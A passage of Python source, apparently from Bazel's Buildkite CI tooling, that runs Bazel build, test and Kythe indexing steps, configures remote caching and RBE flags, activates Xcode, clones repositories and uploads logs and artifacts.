print_expanded_group("Build and test with the following incompatible flags:")
for flag in incompatible_flags:
eprint(flag + "\n")
execute_bazel_run(
bazel_binary, platform, task_config.get("run_targets", None), incompatible_flags
)
if task_config.get("sauce"):
sc_process = start_sauce_connect_proxy(platform, tmpdir)
if needs_clean:
execute_bazel_clean(bazel_binary, platform)
build_targets, test_targets, index_targets = calculate_targets(
task_config, platform, bazel_binary, build_only, test_only
)
if build_targets:
(
build_flags,
json_profile_out_build,
capture_corrupted_outputs_dir_build,
) = calculate_flags(task_config, "build_flags", "build", tmpdir, test_env_vars)
try:
release_name = get_release_name_from_branch_name()
execute_bazel_build(
bazel_version,
bazel_binary,
platform,
build_flags
+ (
["--stamp", "--embed_label=%s" % release_name]
if save_but and release_name
else []
),
build_targets,
None,
incompatible_flags,
)
if save_but:
upload_bazel_binary(platform)
finally:
if json_profile_out_build:
upload_json_profile(json_profile_out_build, tmpdir)
if capture_corrupted_outputs_dir_build:
upload_corrupted_outputs(capture_corrupted_outputs_dir_build, tmpdir)
if test_targets:
test_flags, json_profile_out_test, capture_corrupted_outputs_dir_test = calculate_flags(
task_config, "test_flags", "test", tmpdir, test_env_vars
)
if not is_windows():
# On platforms that support sandboxing (Linux, MacOS) we have
# to allow access to Bazelisk's cache directory.
# However, the flag requires the directory to exist,
# so we create it here in order to not crash when a test
# does not invoke Bazelisk.
bazelisk_cache_dir = get_bazelisk_cache_directory(platform)
os.makedirs(bazelisk_cache_dir, mode=0o755, exist_ok=True)
test_flags.append("--sandbox_writable_path={}".format(bazelisk_cache_dir))
test_bep_file = os.path.join(tmpdir, "test_bep.json")
stop_request = threading.Event()
upload_thread = threading.Thread(
target=upload_test_logs_from_bep, args=(test_bep_file, tmpdir, stop_request)
)
try:
upload_thread.start()
try:
execute_bazel_test(
bazel_version,
bazel_binary,
platform,
test_flags,
test_targets,
test_bep_file,
monitor_flaky_tests,
incompatible_flags,
)
if monitor_flaky_tests:
upload_bep_logs_for_flaky_tests(test_bep_file)
finally:
if json_profile_out_test:
upload_json_profile(json_profile_out_test, tmpdir)
if capture_corrupted_outputs_dir_test:
upload_corrupted_outputs(capture_corrupted_outputs_dir_test, tmpdir)
finally:
stop_request.set()
upload_thread.join()
if index_targets:
(
index_flags,
json_profile_out_index,
capture_corrupted_outputs_dir_index,
) = calculate_flags(task_config, "index_flags", "index", tmpdir, test_env_vars)
index_upload_policy = task_config.get("index_upload_policy", "IfBuildSuccess")
index_upload_gcs = task_config.get("index_upload_gcs", False)
try:
should_upload_kzip = (
True if index_upload_policy == INDEX_UPLOAD_POLICY_ALWAYS else False
)
try:
execute_bazel_build_with_kythe(
bazel_version,
bazel_binary,
platform,
index_flags,
index_targets,
None,
incompatible_flags,
)
if index_upload_policy == INDEX_UPLOAD_POLICY_IF_BUILD_SUCCESS:
should_upload_kzip = True
except subprocess.CalledProcessError as e:
# If not running with Always policy, raise the build error.
if index_upload_policy != INDEX_UPLOAD_POLICY_ALWAYS:
handle_bazel_failure(e, "build")
if should_upload_kzip and not is_pull_request():
try:
merge_and_upload_kythe_kzip(platform, index_upload_gcs)
except subprocess.CalledProcessError:
raise BuildkiteException("Failed to upload kythe kzip")
finally:
if json_profile_out_index:
upload_json_profile(json_profile_out_index, tmpdir)
if capture_corrupted_outputs_dir_index:
upload_corrupted_outputs(capture_corrupted_outputs_dir_index, tmpdir)
finally:
terminate_background_process(sc_process)
if tmpdir:
shutil.rmtree(tmpdir)
def activate_xcode(task_config):
# Get the Xcode version from the config.
wanted_xcode_version = task_config.get("xcode_version", DEFAULT_XCODE_VERSION)
print_collapsed_group(":xcode: Activating Xcode {}...".format(wanted_xcode_version))
# Ensure it's a valid version number.
if not isinstance(wanted_xcode_version, str):
raise BuildkiteException(
"Version number '{}' is not a string. Did you forget to put it in quotes?".format(
wanted_xcode_version
)
)
if not XCODE_VERSION_REGEX.match(wanted_xcode_version):
raise BuildkiteException(
"Invalid Xcode version format '{}', must match the format X.Y[.Z].".format(
wanted_xcode_version
)
)
# This is used to replace e.g. 11.2 with 11.2.1 without having to update all configs.
xcode_version = XCODE_VERSION_OVERRIDES.get(wanted_xcode_version, wanted_xcode_version)
# This falls back to a default version if the selected version is not available.
supported_versions = sorted(
# Stripping "Xcode" prefix and ".app" suffix from e.g. "Xcode12.0.1.app" leaves just the version number.
[os.path.basename(x)[5:-4] for x in glob("/Applications/Xcode*.app")],
reverse=True,
)
if xcode_version not in supported_versions:
xcode_version = DEFAULT_XCODE_VERSION
if xcode_version != wanted_xcode_version:
print_collapsed_group(
":xcode: Fixed Xcode version: {} -> {}...".format(wanted_xcode_version, xcode_version)
)
lines = [
"Your selected Xcode version {} was not available on the machine.".format(
wanted_xcode_version
),
"Bazel CI automatically picked a fallback version: {}.".format(xcode_version),
"Available versions are: {}.".format(supported_versions),
]
execute_command(
[
"buildkite-agent",
"annotate",
"--style=warning",
"\n".join(lines),
"--context",
"ctx-xcode_version_fixed",
]
)
# Check that the selected Xcode version is actually installed on the host.
xcode_path = "/Applications/Xcode{}.app".format(xcode_version)
if not os.path.exists(xcode_path):
raise BuildkiteException("Xcode not found at '{}'.".format(xcode_path))
# Now activate the specified Xcode version and let it install its required components.
# The CI machines have a sudoers config that allows the 'buildkite' user to run exactly
# these two commands, so don't change them without also modifying the file there.
execute_command(["/usr/bin/sudo", "/usr/bin/xcode-select", "--switch", xcode_path])
execute_command(["/usr/bin/sudo", "/usr/bin/xcodebuild", "-runFirstLaunch"])
def get_bazelisk_cache_directory(platform):
# The path relies on the behavior of Go's os.UserCacheDir()
# and of the Go version of Bazelisk.
cache_dir = "Library/Caches" if platform == "macos" else ".cache"
return os.path.join(os.environ.get("HOME"), cache_dir, "bazelisk")
def tests_with_status(bep_file, status):
return set(label for label, _ in test_logs_for_status(bep_file, status=[status]))
def start_sauce_connect_proxy(platform, tmpdir):
print_collapsed_group(":saucelabs: Starting Sauce Connect Proxy")
os.environ["SAUCE_USERNAME"] = "bazel_rules_webtesting"
os.environ["SAUCE_ACCESS_KEY"] = saucelabs_token()
os.environ["TUNNEL_IDENTIFIER"] = str(uuid.uuid4())
os.environ["BUILD_TAG"] = str(uuid.uuid4())
readyfile = os.path.join(tmpdir, "sc_is_ready")
if platform == "windows":
cmd = ["sauce-connect.exe", "-i", os.environ["TUNNEL_IDENTIFIER"], "-f", readyfile]
else:
cmd = ["sc", "-i", os.environ["TUNNEL_IDENTIFIER"], "-f", readyfile]
sc_process = execute_command_background(cmd)
wait_start = time.time()
while not os.path.exists(readyfile):
if time.time() - wait_start > 60:
raise BuildkiteException(
"Sauce Connect Proxy is still not ready after 60 seconds, aborting!"
)
time.sleep(1)
print("Sauce Connect Proxy is ready, continuing...")
return sc_process
def saucelabs_token():
return decrypt_token(encrypted_token=ENCRYPTED_SAUCELABS_TOKEN, kms_key="saucelabs-access-key")
def current_branch_is_main_branch():
return os.getenv("BUILDKITE_BRANCH") in ("master", "stable", "main")
def get_release_name_from_branch_name():
res = re.match(r"release-(\d+\.\d+\.\d+(rc\d+)?).*", os.getenv("BUILDKITE_BRANCH"))
return res.group(1) if res else ""
def is_pull_request():
third_party_repo = os.getenv("BUILDKITE_PULL_REQUEST_REPO", "")
return len(third_party_repo) > 0
def has_flaky_tests(bep_file):
return len(test_logs_for_status(bep_file, status=["FLAKY"])) > 0
def print_bazel_version_info(bazel_binary, platform):
print_collapsed_group(":information_source: Bazel Info")
version_output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "version"]
)
execute_command(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "info"]
)
match = BUILD_LABEL_PATTERN.search(version_output)
return match.group(1) if match else "unreleased binary"
def print_environment_variables_info():
print_collapsed_group(":information_source: Environment Variables")
for key, value in os.environ.items():
eprint("%s=(%s)" % (key, value))
def upload_bazel_binary(platform):
print_collapsed_group(":gcloud: Uploading Bazel Under Test")
if platform == "windows":
binary_dir = r"bazel-bin\src"
binary_name = r"bazel.exe"
binary_nojdk_name = r"bazel_nojdk.exe"
else:
binary_dir = "bazel-bin/src"
binary_name = "bazel"
binary_nojdk_name = "bazel_nojdk"
execute_command(["buildkite-agent", "artifact", "upload", binary_name], cwd=binary_dir)
execute_command(["buildkite-agent", "artifact", "upload", binary_nojdk_name], cwd=binary_dir)
def merge_and_upload_kythe_kzip(platform, index_upload_gcs):
print_collapsed_group(":gcloud: Uploading kythe kzip")
kzips = glob("bazel-out/*/extra_actions/**/*.kzip", recursive=True)
build_number = os.getenv("BUILDKITE_BUILD_NUMBER")
git_commit = os.getenv("BUILDKITE_COMMIT")
final_kzip_name = "{}-{}-{}.kzip".format(build_number, platform, git_commit)
execute_command([f"{KYTHE_DIR}/tools/kzip", "merge", "--output", final_kzip_name] + kzips)
execute_command(["buildkite-agent", "artifact", "upload", final_kzip_name])
if index_upload_gcs:
pipeline = os.getenv("BUILDKITE_PIPELINE_SLUG")
destination = KZIPS_BUCKET + pipeline + "/" + final_kzip_name
print("Uploading to GCS {}".format(destination))
execute_command([gsutil_command(), "cp", final_kzip_name, destination])
def download_binary(dest_dir, platform, binary_name):
source_step = create_label(platform, "Bazel", build_only=True)
execute_command(
["buildkite-agent", "artifact", "download", binary_name, dest_dir, "--step", source_step]
)
bazel_binary_path = os.path.join(dest_dir, binary_name)
st = os.stat(bazel_binary_path)
os.chmod(bazel_binary_path, st.st_mode | stat.S_IEXEC)
return bazel_binary_path
def download_bazel_binary(dest_dir, platform):
binary_name = "bazel.exe" if platform == "windows" else "bazel"
return download_binary(dest_dir, platform, binary_name)
def download_bazel_nojdk_binary(dest_dir, platform):
binary_name = "bazel_nojdk.exe" if platform == "windows" else "bazel_nojdk"
return download_binary(dest_dir, platform, binary_name)
def download_binary_at_commit(
dest_dir, platform, bazel_git_commit, bazel_binary_url, bazel_binary_path
):
try:
execute_command([gsutil_command(), "cp", bazel_binary_url, bazel_binary_path])
except subprocess.CalledProcessError as e:
raise BuildkiteException(
"Failed to download Bazel binary at %s, error message:\n%s" % (bazel_git_commit, str(e))
)
st = os.stat(bazel_binary_path)
os.chmod(bazel_binary_path, st.st_mode | stat.S_IEXEC)
return bazel_binary_path
def download_bazel_binary_at_commit(dest_dir, platform, bazel_git_commit):
url = bazelci_builds_gs_url(platform, bazel_git_commit)
path = os.path.join(dest_dir, "bazel.exe" if platform == "windows" else "bazel")
return download_binary_at_commit(dest_dir, platform, bazel_git_commit, url, path)
def download_bazel_nojdk_binary_at_commit(dest_dir, platform, bazel_git_commit):
url = bazelci_builds_nojdk_gs_url(platform, bazel_git_commit)
path = os.path.join(dest_dir, "bazel_nojdk.exe" if platform == "windows" else "bazel_nojdk")
return download_binary_at_commit(dest_dir, platform, bazel_git_commit, url, path)
def get_mirror_path(git_repository, platform):
mirror_root = {
"macos": "/usr/local/var/bazelbuild/",
"windows": "c:\\buildkite\\bazelbuild\\",
}.get(platform, "/var/lib/bazelbuild/")
return mirror_root + re.sub(r"[^0-9A-Za-z]", "-", git_repository)
def clone_git_repository(git_repository, platform, git_commit=None):
root = downstream_projects_root(platform)
project_name = re.search(r"/([^/]+)\.git$", git_repository).group(1)
clone_path = os.path.join(root, project_name)
print_collapsed_group(
"Fetching %s sources at %s" % (project_name, git_commit if git_commit else "HEAD")
)
mirror_path = get_mirror_path(git_repository, platform)
if not os.path.exists(clone_path):
if os.path.exists(mirror_path):
execute_command(
["git", "clone", "-v", "--reference", mirror_path, git_repository, clone_path]
)
else:
execute_command(["git", "clone", "-v", git_repository, clone_path])
os.chdir(clone_path)
execute_command(["git", "remote", "set-url", "origin", git_repository])
execute_command(["git", "clean", "-fdqx"])
execute_command(["git", "submodule", "foreach", "--recursive", "git clean -fdqx"])
execute_command(["git", "fetch", "origin"])
if git_commit:
# sync to a specific commit of this repository
execute_command(["git", "reset", git_commit, "--hard"])
else:
# sync to the latest commit of HEAD. Unlikely git pull this also works after a force push.
remote_head = (
subprocess.check_output(["git", "symbolic-ref", "refs/remotes/origin/HEAD"])
.decode("utf-8")
.rstrip()
)
execute_command(["git", "reset", remote_head, "--hard"])
execute_command(["git", "submodule", "sync", "--recursive"])
execute_command(["git", "submodule", "update", "--init", "--recursive", "--force"])
execute_command(["git", "submodule", "foreach", "--recursive", "git reset --hard"])
execute_command(["git", "clean", "-fdqx"])
execute_command(["git", "submodule", "foreach", "--recursive", "git clean -fdqx"])
return clone_path
def execute_batch_commands(commands):
if not commands:
return
print_collapsed_group(":batch: Setup (Batch Commands)")
batch_commands = "&".join(commands)
return subprocess.run(batch_commands, shell=True, check=True, env=os.environ).returncode
def execute_shell_commands(commands):
if not commands:
return
print_collapsed_group(":bash: Setup (Shell Commands)")
shell_command = "\n".join(["set -e"] + commands)
execute_command([shell_command], shell=True)
def handle_bazel_failure(exception, action):
msg = "bazel {0} failed with exit code {1}".format(action, exception.returncode)
if use_bazelisk_migrate():
print_collapsed_group(msg)
else:
raise BuildkiteException(msg)
def execute_bazel_run(bazel_binary, platform, targets, incompatible_flags):
if not targets:
return
print_collapsed_group("Setup (Run Targets)")
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
incompatible_flags_to_use = (
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags
)
for target in targets:
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["run"]
+ common_build_flags(None, platform)
+ incompatible_flags_to_use
+ [target]
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "run")
def remote_caching_flags(platform):
# Only enable caching for untrusted and testing builds.
if CLOUD_PROJECT not in ["bazel-untrusted"]:
return []
platform_cache_key = [BUILDKITE_ORG.encode("utf-8")]
# Whenever the remote cache was known to have been poisoned increase the number below
platform_cache_key += ["cache-poisoning-20210811".encode("utf-8")]
if platform == "macos":
platform_cache_key += [
# macOS version:
subprocess.check_output(["/usr/bin/sw_vers", "-productVersion"]),
# Path to Xcode:
subprocess.check_output(["/usr/bin/xcode-select", "-p"]),
# Xcode version:
subprocess.check_output(["/usr/bin/xcodebuild", "-version"]),
]
# Use a local cache server for our macOS machines.
flags = ["--remote_cache=http://100.107.73.148"]
else:
platform_cache_key += [
# Platform name:
platform.encode("utf-8")
]
# Use RBE for caching builds running on GCE.
flags = [
"--google_default_credentials",
"--remote_cache=remotebuildexecution.googleapis.com",
"--remote_instance_name=projects/{}/instances/default_instance".format(CLOUD_PROJECT),
]
platform_cache_digest = hashlib.sha256()
for key in platform_cache_key:
eprint("Adding to platform cache key: {}".format(key))
platform_cache_digest.update(key)
platform_cache_digest.update(b":")
flags += [
"--remote_timeout=60",
"--remote_max_connections=200",
'--remote_default_platform_properties=properties:{name:"cache-silo-key" value:"%s"}'
% platform_cache_digest.hexdigest(),
]
return flags
def remote_enabled(flags):
# Detect if the project configuration enabled its own remote caching / execution.
remote_flags = ["--remote_executor", "--remote_cache", "--remote_http_cache"]
for flag in flags:
for remote_flag in remote_flags:
if flag.startswith(remote_flag):
return True
return False
def concurrent_jobs(platform):
return "75" if platform.startswith("rbe_") else str(multiprocessing.cpu_count())
def concurrent_test_jobs(platform):
if platform.startswith("rbe_"):
return "75"
elif platform == "windows":
return "8"
elif platform.startswith("macos") and THIS_IS_TESTING:
return "4"
elif platform.startswith("macos"):
return "8"
return "12"
def common_startup_flags(platform):
if platform == "windows":
if os.path.exists("D:/b"):
# This machine has a local SSD mounted as drive D.
return ["--output_user_root=D:/b"]
else:
# This machine uses its PD-SSD as the build directory.
return ["--output_user_root=C:/b"]
return []
def common_build_flags(bep_file, platform):
flags = [
"--show_progress_rate_limit=5",
"--curses=yes",
"--color=yes",
"--terminal_columns=143",
"--show_timestamps",
"--verbose_failures",
"--jobs=" + concurrent_jobs(platform),
"--announce_rc",
"--experimental_repository_cache_hardlinks",
# Some projects set --disk_cache in their project-specific bazelrc, which we never want on
# CI, so let's just disable it explicitly.
"--disk_cache=",
]
if platform == "windows":
pass
elif platform == "macos":
flags += [
"--sandbox_writable_path=/var/tmp/_bazel_buildkite/cache/repos/v1",
"--test_env=REPOSITORY_CACHE=/var/tmp/_bazel_buildkite/cache/repos/v1",
]
else:
flags += ["--sandbox_tmpfs_path=/tmp"]
if bep_file:
flags += [
"--experimental_build_event_json_file_path_conversion=false",
"--build_event_json_file=" + bep_file,
]
return flags
def rbe_flags(original_flags, accept_cached):
# Enable remote execution via RBE.
flags = [
"--remote_executor=remotebuildexecution.googleapis.com",
"--remote_instance_name=projects/bazel-untrusted/instances/default_instance",
"--remote_timeout=3600",
"--incompatible_strict_action_env",
"--google_default_credentials",
"--toolchain_resolution_debug",
]
# Enable BES / Build Results reporting.
flags += [
"--bes_backend=buildeventservice.googleapis.com",
"--bes_timeout=360s",
"--project_id=bazel-untrusted",
]
if not accept_cached:
flags += ["--noremote_accept_cached"]
# Adapted from https://github.com/bazelbuild/bazel-toolchains/blob/master/bazelrc/.bazelrc
flags += [
# These should NOT longer need to be modified.
# All that is needed is updating the @bazel_toolchains repo pin
# in projects' WORKSPACE files.
#
# Toolchain related flags to append at the end of your .bazelrc file.
"--host_javabase=@buildkite_config//java:jdk",
"--javabase=@buildkite_config//java:jdk",
"--host_java_toolchain=@bazel_tools//tools/jdk:toolchain_hostjdk8",
"--java_toolchain=@bazel_tools//tools/jdk:toolchain_hostjdk8",
"--crosstool_top=@buildkite_config//cc:toolchain",
"--action_env=BAZEL_DO_NOT_DETECT_CPP_TOOLCHAIN=1",
]
# Platform flags:
# The toolchain container used for execution is defined in the target indicated
# by "extra_execution_platforms", "host_platform" and "platforms".
# If you are using your own toolchain container, you need to create a platform
# target with "constraint_values" that allow for the toolchain specified with
# "extra_toolchains" to be selected (given constraints defined in
# "exec_compatible_with").
# More about platforms: https://docs.bazel.build/versions/master/platforms.html
# Don't add platform flags if they are specified already.
platform_flags = {
"--extra_toolchains": "@buildkite_config//config:cc-toolchain",
"--extra_execution_platforms": "@buildkite_config//config:platform",
"--host_platform": "@buildkite_config//config:platform",
"--platforms": "@buildkite_config//config:platform",
}
for platform_flag, value in list(platform_flags.items()):
found = False
for original_flag in original_flags:
if original_flag.startswith(platform_flag):
found = True
break
if not found:
flags += [platform_flag + "=" + value]
return flags
def compute_flags(
platform, flags, incompatible_flags, bep_file, bazel_binary, enable_remote_cache=False
):
aggregated_flags = common_build_flags(bep_file, platform)
if not remote_enabled(flags):
if platform.startswith("rbe_"):
aggregated_flags += rbe_flags(flags, accept_cached=enable_remote_cache)
elif enable_remote_cache:
aggregated_flags += remote_caching_flags(platform)
aggregated_flags += flags
if incompatible_flags:
aggregated_flags += incompatible_flags
for i, flag in enumerate(aggregated_flags):
if "$HOME" in flag:
if platform == "windows":
if os.path.exists("D:/"):
home = "D:"
else:
home = "C:/b"
elif platform == "macos":
home = "/Users/buildkite"
else:
home = "/var/lib/buildkite-agent"
aggregated_flags[i] = flag.replace("$HOME", home)
if "$OUTPUT_BASE" in flag:
output_base = execute_command_and_get_output(
[bazel_binary] + common_startup_flags(platform) + ["info", "output_base"],
print_output=False,
).strip()
aggregated_flags[i] = flag.replace("$OUTPUT_BASE", output_base)
return aggregated_flags
def execute_bazel_clean(bazel_binary, platform):
print_expanded_group(":bazel: Clean")
try:
execute_command([bazel_binary] + common_startup_flags(platform) + ["clean", "--expunge"])
except subprocess.CalledProcessError as e:
raise BuildkiteException("bazel clean failed with exit code {}".format(e.returncode))
def kythe_startup_flags():
return [f"--bazelrc={KYTHE_DIR}/extractors.bazelrc"]
def kythe_build_flags():
return [
"--experimental_convenience_symlinks=normal",
f"--override_repository=kythe_release={KYTHE_DIR}",
]
def execute_bazel_build(
bazel_version, bazel_binary, platform, flags, targets, bep_file, incompatible_flags
):
print_collapsed_group(":bazel: Computing flags for build step")
aggregated_flags = compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=True,
)
print_expanded_group(":bazel: Build ({})".format(bazel_version))
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["build"]
+ aggregated_flags
+ ["--"]
+ targets
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "build")
def execute_bazel_build_with_kythe(
bazel_version, bazel_binary, platform, flags, targets, bep_file, incompatible_flags
):
print_collapsed_group(":bazel: Computing flags for build step")
aggregated_flags = compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=False,
)
print_expanded_group(":bazel: Build ({})".format(bazel_version))
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ kythe_startup_flags()
+ ["build"]
+ kythe_build_flags()
+ aggregated_flags
+ ["--"]
+ targets
)
def calculate_targets(task_config, platform, bazel_binary, build_only, test_only):
build_targets = [] if test_only else task_config.get("build_targets", [])
test_targets = [] if build_only else task_config.get("test_targets", [])
index_targets = [] if (build_only or test_only) else task_config.get("index_targets", [])
index_targets_query = (
None if (build_only or test_only) else task_config.get("index_targets_query", None)
)
if index_targets_query:
output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "query", index_targets_query],
print_output=False,
)
index_targets += output.strip().split("\n")
# Remove the "--" argument splitter from the list that some configs explicitly
# include. We'll add it back again later where needed.
build_targets = [x.strip() for x in build_targets if x.strip() != "--"]
test_targets = [x.strip() for x in test_targets if x.strip() != "--"]
index_targets = [x.strip() for x in index_targets if x.strip() != "--"]
shard_id = int(os.getenv("BUILDKITE_PARALLEL_JOB", "-1"))
shard_count = int(os.getenv("BUILDKITE_PARALLEL_JOB_COUNT", "-1"))
if shard_id > -1 and shard_count > -1:
print_collapsed_group(
":female-detective: Calculating targets for shard {}/{}".format(
shard_id + 1, shard_count
)
)
expanded_test_targets = expand_test_target_patterns(bazel_binary, platform, test_targets)
test_targets = get_targets_for_shard(expanded_test_targets, shard_id, shard_count)
return build_targets, test_targets, index_targets
def expand_test_target_patterns(bazel_binary, platform, test_targets):
included_targets, excluded_targets = partition_targets(test_targets)
excluded_string = (
" except tests(set({}))".format(" ".join("'{}'".format(t) for t in excluded_targets))
if excluded_targets
else ""
)
exclude_manual = ' except tests(attr("tags", "manual", set({})))'.format(
" ".join("'{}'".format(t) for t in included_targets)
)
eprint("Resolving test targets via bazel query")
output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ [
"--nomaster_bazelrc",
"--bazelrc=/dev/null",
"query",
"tests(set({})){}{}".format(
" ".join("'{}'".format(t) for t in included_targets),
excluded_string,
exclude_manual,
),
],
print_output=False,
).strip()
return output.split("\n") if output else []
def partition_targets(targets):
included_targets, excluded_targets = [], []
for target in targets:
if target.startswith("-"):
excluded_targets.append(target[1:])
else:
included_targets.append(target)
return included_targets, excluded_targets
def get_targets_for_shard(test_targets, shard_id, shard_count):
# TODO(fweikert): implement a more sophisticated algorithm
return sorted(test_targets)[shard_id::shard_count]
def execute_bazel_test(
bazel_version,
bazel_binary,
platform,
flags,
targets,
bep_file,
monitor_flaky_tests,
incompatible_flags,
):
aggregated_flags = [
"--flaky_test_attempts=3",
"--build_tests_only",
"--local_test_jobs=" + concurrent_test_jobs(platform),
]
# Don't enable remote caching if the user enabled remote execution / caching themselves
# or flaky test monitoring is enabled, as remote caching makes tests look less flaky than
# they are.
print_collapsed_group(":bazel: Computing flags for test step")
aggregated_flags += compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=not monitor_flaky_tests,
)
print_expanded_group(":bazel: Test ({})".format(bazel_version))
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["test"]
+ aggregated_flags
+ ["--"]
+ targets
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "test")
def get_json_profile_flags(out_file):
return [
"--experimental_generate_json_trace_profile",
"--experimental_profile_cpu_usage",
"--experimental_json_trace_compression",
"--profile={}".format(out_file),
]
def upload_bep_logs_for_flaky_tests(test_bep_file):
if has_flaky_tests(test_bep_file):
build_number = os.getenv("BUILDKITE_BUILD_NUMBER")
pipeline_slug = os.getenv("BUILDKITE_PIPELINE_SLUG")
execute_command(
[
gsutil_command(),
"cp",
test_bep_file,
FLAKY_TESTS_BUCKET + pipeline_slug + "/" + build_number + ".json",
]
)
def upload_test_logs_from_bep(bep_file, tmpdir, stop_request):
uploaded_targets = set()
while True:
done = stop_request.isSet()
if os.path.exists(bep_file):
all_test_logs = test_logs_for_status(bep_file, status=["FAILED", "TIMEOUT", "FLAKY"])
test_logs_to_upload = [
(target, files) for target, files in all_test_logs if target not in uploaded_targets
]
if test_logs_to_upload:
files_to_upload = rename_test_logs_for_upload(test_logs_to_upload, tmpdir)
cwd = os.getcwd()
try:
os.chdir(tmpdir)
test_logs = [os.path.relpath(file, tmpdir) for file in files_to_upload]
test_logs = sorted(test_logs)
execute_command(["buildkite-agent", "artifact", "upload", ";".join(test_logs)])
finally:
uploaded_targets.update([target for target, _ in test_logs_to_upload])
os.chdir(cwd)
if done:
break
time.sleep(5)
def upload_json_profile(json_profile_path, tmpdir):
if not os.path.exists(json_profile_path):
return
print_collapsed_group(":gcloud: Uploading JSON Profile")
execute_command(["buildkite-agent", "artifact", "upload", json_profile_path], cwd=tmpdir)
def upload_corrupted_outputs(capture_corrupted_outputs_dir, tmpdir):
if not os.path.exists(capture_corrupted_outputs_dir):
return
print_collapsed_group(":gcloud: Uploading corrupted outputs")
execute_command(
["buildkite-agent", "artifact", "upload", "{}/**/*".format(capture_corrupted_outputs_dir)],
cwd=tmpdir,
)
def rename_test_logs_for_upload(test_logs, tmpdir):
# Rename the test.log files to the target that created them
# so that it's easy to associate test.log and target.
new_paths = []
for label, files in test_logs:
attempt = 0
if len(files) > 1:
attempt = 1
for test_log in files:
try:
new_path = test_label_to_path(tmpdir, label, attempt)
os.makedirs(os.path.dirname(new_path), exist_ok=True)
copyfile(test_log, new_path)
new_paths.append(new_path)
attempt += 1
except IOError as err:
# Log error and ignore.
eprint(err)
return new_paths
def test_label_to_path(tmpdir, label, attempt):
# remove leading //
path = label.lstrip("/:")
path = path.replace("/", os.sep)
path = path.replace(":", os.sep)
if attempt == 0:
path = os.path.join(path, "test.log")
else:
path = os.path.join(path, "attempt_" + str(attempt) + ".log")
return os.path.join(tmpdir, path)
def test_logs_for_status(bep_file, status):
targets = []
with open(bep_file, encoding="utf-8") as f:
raw_data = f.read()
decoder = json.JSONDecoder()
pos = 0
while pos < len(raw_data):
try:
bep_obj, size = decoder.raw_decode(raw_data[pos:])
except ValueError as e:
eprint("JSON decoding error: " + str(e))
return targets
if "testSummary" in bep_obj:
test_target = bep_obj["id"]["testSummary"]["label"]
test_status = bep_obj["testSummary"]["overallStatus"]
if test_status in status:
outputs = bep_obj["testSummary"]["failed"]
test_logs = []
for output in outputs:
test_logs.append(url2pathname(urlparse(output["uri"]).path))
targets.append((test_target, test_logs))
pos += size + 1
return targets
def execute_command_and_get_output(args, shell=False, fail_if_nonzero=True, print_output=True):
eprint(" ".join(args))
process = subprocess.run(
args,
shell=shell,
check=fail_if_nonzero,
env=os.environ,
stdout=subprocess.PIPE,
errors="replace",
universal_newlines=True,
)
if print_output:
eprint(process.stdout)
return process.stdout
def execute_command(args, shell=False, fail_if_nonzero=True, cwd=None, print_output=True):
if print_output:
eprint(" ".join(args))
return subprocess.run(
args, shell=shell, check=fail_if_nonzero, env=os.environ, cwd=cwd
).returncode
def execute_command_background(args):
eprint(" ".join(args))
return subprocess.Popen(args, env=os.environ)
def terminate_background_process(process):
if process:
process.terminate()
try:
process.wait(timeout=10)
except subprocess.TimeoutExpired:
process.kill()
def create_step(label, commands, platform, shards=1, soft_fail=None):
if "docker-image" in PLATFORMS[platform]:
step = create_docker_step(
label, image=PLATFORMS[platform]["docker-image"], commands=commands
)
else:
step = {
"label": label,
"command": commands,
"agents": {"queue": PLATFORMS[platform]["queue"]},
}
if shards > 1:
step["label"] += " (shard %n)"
step["parallelism"] = shards
if soft_fail is not None:
step["soft_fail"] = soft_fail
# Enforce a global 8 hour job timeout.
step["timeout_in_minutes"] = 8 * 60
# Automatically retry when an agent got lost (usually due to an infra flake).
step["retry"] = {
"automatic": [
{"exit_status": -1, "limit": 3}, # Buildkite internal "agent lost" exit code
{"exit_status": 137, "limit": 3}, # SIGKILL
{"exit_status": 143, "limit": 3}, # SIGTERM
]
}
return step
def create_docker_step(label, image, commands=None, additional_env_vars=None):
env = ["ANDROID_HOME", "ANDROID_NDK_HOME", "BUILDKITE_ARTIFACT_UPLOAD_DESTINATION"]
if additional_env_vars:
env += ["{}={}".format(k, v) for k, v in additional_env_vars.items()]
step = {
"label": label,
"command": commands,
"agents": {"queue": "default"},
"plugins": {
"docker#v3.8.0": {
"always-pull": True,
"environment": env,
"image": image,
"network": "host",
"privileged": True,
"propagate-environment": True,
"propagate-uid-gid": True,
"volumes": [
"/etc/group:/etc/group:ro",
"/etc/passwd:/etc/passwd:ro",
"/opt:/opt:ro",
"/var/lib/buildkite-agent:/var/lib/buildkite-agent",
"/var/lib/gitmirrors:/var/lib/gitmirrors:ro",
